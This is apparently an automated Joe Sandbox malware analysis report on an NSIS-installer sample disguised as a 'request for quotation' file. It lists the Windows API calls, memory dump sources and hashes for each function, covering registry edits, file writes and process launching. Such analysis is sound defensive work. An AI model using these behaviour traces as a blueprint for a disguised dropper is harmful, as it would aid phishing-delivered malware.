                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                • String ID: *?|<>/":
                                                                                                                                • API String ID: 589700163-165019052
                                                                                                                                • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                                                • Instruction ID: e0619f79a043cffb4c3b00824a243f33de9385cd0f0c41224b0956f888f04927
                                                                                                                                • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                                                • Instruction Fuzzy Hash: 3511C47680021295EB307B548C40BB762F8EF957A0F56403FE996B72C2E77C5C9282BD
                                                                                                                                APIs
                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 0040252F
                                                                                                                                • lstrlenA.KERNEL32(00409D80,?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 00402536
                                                                                                                                • WriteFile.KERNEL32(00000000,?,00409D80,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                                                • String ID: 8
                                                                                                                                • API String ID: 1453599865-4194326291
                                                                                                                                • Opcode ID: 9598e7bf0115d7b54bac2ba601592103c37d762dad4affe4391b543117dffca7
                                                                                                                                • Instruction ID: b6741c74acf97665735c623be1ff62c12e58b25bca11cb73faf7774dd427f28f
                                                                                                                                • Opcode Fuzzy Hash: 9598e7bf0115d7b54bac2ba601592103c37d762dad4affe4391b543117dffca7
                                                                                                                                • Instruction Fuzzy Hash: A5019671A44204FBD700AFA0DE49EAF7278AB50319F20053BF102B61D2D7BC5D41DA2D
                                                                                                                                APIs
                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000,00409580,00435000,?,?,00000031), ref: 00401793
                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,00409580,00409580,00000000,00000000,00409580,00435000,?,?,00000031), ref: 004017B8
                                                                                                                                  • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                                                                  • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                  • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                  • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                  • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                  • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                  • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                  • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1941528284-0
                                                                                                                                • Opcode ID: f5fb99fc77cb499af78de08433a29d52c657005603a562d7fa302922f95013b5
                                                                                                                                • Instruction ID: bc5e94bc6114b027384bbb583ab77f55914405742357509a7a45d2f14902e26b
                                                                                                                                • Opcode Fuzzy Hash: f5fb99fc77cb499af78de08433a29d52c657005603a562d7fa302922f95013b5
                                                                                                                                • Instruction Fuzzy Hash: 0541A071900515BACF10BBB5CC46DAF7A78EF05368B20863BF521B11E2D73C8A419A6E
                                                                                                                                APIs
                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1912718029-0
                                                                                                                                • Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                                                • Instruction ID: ada95b61e8ad34ac3bb2ad29be3e5f3f7733698153a8948b25f67961a2a4c07b
                                                                                                                                • Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                                                • Instruction Fuzzy Hash: 2E113D7190400CFEEF21AF90DE89DAE3B79EB54348F10447AFA05B10A0D3759E51EA69
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                • Opcode ID: 548b7988845d34974c7096401ec02f3577b62e53f99ad47469e6fcf51543f742
                                                                                                                                • Instruction ID: 62a37a396924b9b833916b179176740e0848b2f5cedec3081aefe4e9105dc113
                                                                                                                                • Opcode Fuzzy Hash: 548b7988845d34974c7096401ec02f3577b62e53f99ad47469e6fcf51543f742
                                                                                                                                • Instruction Fuzzy Hash: F0F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                                                                                APIs
                                                                                                                                • GetDC.USER32(?), ref: 00401D44
                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                                                                • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3808545654-0
                                                                                                                                • Opcode ID: 6de236fac86f4cc62a0a7bf8fa179f1b370f6b686e9a3dedb6aaee9d500d3606
                                                                                                                                • Instruction ID: 3b80acf522b7bf2f021413e8febbbf72b8f641a50adb0d53ac9f1aa9edf06097
                                                                                                                                • Opcode Fuzzy Hash: 6de236fac86f4cc62a0a7bf8fa179f1b370f6b686e9a3dedb6aaee9d500d3606
                                                                                                                                • Instruction Fuzzy Hash: DF01D131948280AFEB016BB0AE0BB9ABF74DF95301F144479F245B62E2C77914049F7E
                                                                                                                                APIs
                                                                                                                                • SetFilePointer.KERNEL32(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                                                                                • WriteFile.KERNEL32(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$PointerWrite
                                                                                                                                • String ID: x>A
                                                                                                                                • API String ID: 539440098-3854404225
                                                                                                                                • Opcode ID: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
                                                                                                                                • Instruction ID: dc2c699ff297b31fb9e84695071232237a0836a1395088a2783af72dccbdbb3b
                                                                                                                                • Opcode Fuzzy Hash: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
                                                                                                                                • Instruction Fuzzy Hash: A8312871500219EBDF10CF65EC44AAA3FBCEB08755F20813AF905AA1A0D3349E50DBA9
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A09
                                                                                                                                • wsprintfW.USER32 ref: 00404A12
                                                                                                                                • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A25
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                • Opcode ID: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
                                                                                                                                • Instruction ID: 6b2e2e184c3c611d12d6b53aa9198873543b26f6782fca7c8cbe4a2e3a07221a
                                                                                                                                • Opcode Fuzzy Hash: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
                                                                                                                                • Instruction Fuzzy Hash: 1411E2736001243BCB10A66D9C45EEF368D9BC6334F180637FA29F61D1DA799C2186EC
                                                                                                                                APIs
                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                • String ID: !
                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                • Opcode ID: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                                                • Instruction ID: 3450dd174e4bd499bd5dd80d9ee349d4783428bbf063aee010979b0fef1ae38f
                                                                                                                                • Opcode Fuzzy Hash: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                                                • Instruction Fuzzy Hash: D8217471A44109BEEF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                                                                APIs
                                                                                                                                • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                                                                • lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                                                                • RegSetValueExW.ADVAPI32(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseCreateValuelstrlen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1356686001-0
                                                                                                                                • Opcode ID: a8bbc55d30affaabc6cd86b2271235a8e32791a35e6a6594074806b6736fc700
                                                                                                                                • Instruction ID: 3600ae87f41ed0761c30afac485ceb57641edc98565fd21ac0e2bbddf966c716
                                                                                                                                • Opcode Fuzzy Hash: a8bbc55d30affaabc6cd86b2271235a8e32791a35e6a6594074806b6736fc700
                                                                                                                                • Instruction Fuzzy Hash: 511160B1A00108BEEB10AFA4DD49EAFBB7CEB50358F10443AF905B61D1D7B85D419B69
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 004059E0: CharNextW.USER32(?,?,00424ED8,?,00405A54,00424ED8,00424ED8,00436800,?,771B2EE0,00405792,?,00436800,771B2EE0,00434000), ref: 004059EE
                                                                                                                                  • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 004059F3
                                                                                                                                  • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 00405A0B
                                                                                                                                • CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                                                                • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                                                                • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3751793516-0
                                                                                                                                • Opcode ID: ab4beae8261b44de63f604e0a73f5b1755ddd155d8cc8e63c414e47e0b3a8ad9
                                                                                                                                • Instruction ID: 793db7a5d63411832aed35bcc9698a3b838560232fc9f0aff2bd133e4d1ca9b1
                                                                                                                                • Opcode Fuzzy Hash: ab4beae8261b44de63f604e0a73f5b1755ddd155d8cc8e63c414e47e0b3a8ad9
                                                                                                                                • Instruction Fuzzy Hash: 8E11C271904100EBDF206FA0CD449AF7AB4FF14369B34463BF882B62E1D23D4941DA6E
                                                                                                                                APIs
                                                                                                                                • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                                                                • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                                                                • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                                                  • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1404258612-0
                                                                                                                                • Opcode ID: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                                                • Instruction ID: 0d64a3d5d22a86ce83a9b45ae5cd800923300da454a86426803db7941f711343
                                                                                                                                • Opcode Fuzzy Hash: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                                                • Instruction Fuzzy Hash: 76113675A00208AFDB00DFA5C945DAEBBB9EF04344F20407AF905F62A1D7349E50CB68
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                  • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                  • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                  • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                  • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                  • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                  • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                  • Part of subcall function 00405665: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                                                                  • Part of subcall function 00405665: CloseHandle.KERNEL32(?), ref: 00405697
                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                                                                • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3585118688-0
                                                                                                                                • Opcode ID: d15ae0a482c79c0d8e7c95f8c2190dddee124483964ec219d5696f0573d40edc
                                                                                                                                • Instruction ID: 1710045f99402437403c6baccff52884d9c8abed8acdccfc98223cb8aca5cd2d
                                                                                                                                • Opcode Fuzzy Hash: d15ae0a482c79c0d8e7c95f8c2190dddee124483964ec219d5696f0573d40edc
                                                                                                                                • Instruction Fuzzy Hash: DC11A171D04204EBCF109FA0CD459DE7AB5EB04318F20447BE505B61E0C3798A82DF99
                                                                                                                                APIs
                                                                                                                                • IsWindowVisible.USER32(?), ref: 00405137
                                                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405188
                                                                                                                                  • Part of subcall function 0040417B: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418D
